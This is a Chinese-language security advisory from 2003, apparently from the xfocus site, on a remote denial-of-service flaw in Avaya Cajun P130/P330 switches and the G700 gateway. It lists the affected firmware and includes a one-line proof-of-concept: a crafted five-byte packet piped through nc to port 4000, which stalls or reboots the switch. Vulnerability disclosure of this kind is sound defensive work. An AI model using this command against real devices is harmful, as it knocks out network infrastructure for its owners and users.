xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Avaya Cajun Network Switch连接延迟拒绝服务漏洞


发布时间:2003-06-18
更新时间:2003-06-23
严重程度:
威胁程度:远程拒绝服务
错误类型:意外情况处置错误
利用方式:服务器模式

BUGTRAQ ID:7961

受影响系统
Avaya Cajun P130 Series Firmware 2.9.1
   + Avaya P130
Avaya Cajun P133 Series Firmware 2.6.1
Avaya Cajun P330 Series Firmware 3.8.1
   + Avaya P330-ML
   + Avaya P330T
   + Avaya P333R
   + Avaya P333R-LB
Avaya Cajun P330 Series Firmware 3.8.2
   + Avaya P330-ML
   + Avaya P330T
   + Avaya P333R
   + Avaya P333R-LB
Avaya Cajun P330 Series Firmware 3.9.1
   + Avaya P330-ML
   + Avaya P330T
   + Avaya P333R
   + Avaya P333R-LB
Avaya Cajun P330 Series Firmware 3.10
   + Avaya P330-ML
   + Avaya P330T
   + Avaya P333R
   + Avaya P333R-LB
Avaya Cajun P330 Series Firmware 3.11
   + Avaya P330-ML
   + Avaya P330T
   + Avaya P333R
   + Avaya P333R-LB
Avaya Cajun P330 Series Firmware 3.12.1
Avaya Cajun P333 Series Firmware 3.12 .0
Avaya G700 Media Gateway 3.x
详细描述
通过连接Avaya交换机4000端口,并发送5个字节的包,前4个字节代表一个负整数的包,就可以使交换机停止响应,多此请求可导致交换机重新启动。

测试代码
sq5bpf@hash:~$ printf "\x80dupa"|nc -v -v -v -n 192.168.66.3 4000
(UNKNOWN) [192.168.66.3] 4000 (?) open
[the connections stalls]

解决方案
尚无

相关信息
参考:http://www.securityfocus.com/archive/1/325582
http://support.avaya.com/japple/css/japple?temp.groupID=128450&temp.selectedFamily=153415&temp.selectedProduct=153418&temp.selectedBucket=126995&temp.feedbackState=askForFeedback&temp.documentID=153420&PAGE=avaya.css.CSSLvl1Detail&executeTransaction=avaya
相关主页:http://support.avaya.com/japple/css/japple?PAGE=avaya.css.CSSLvl1&ac.productFamily=-1&ac.productID=-1&temp.groupID=142804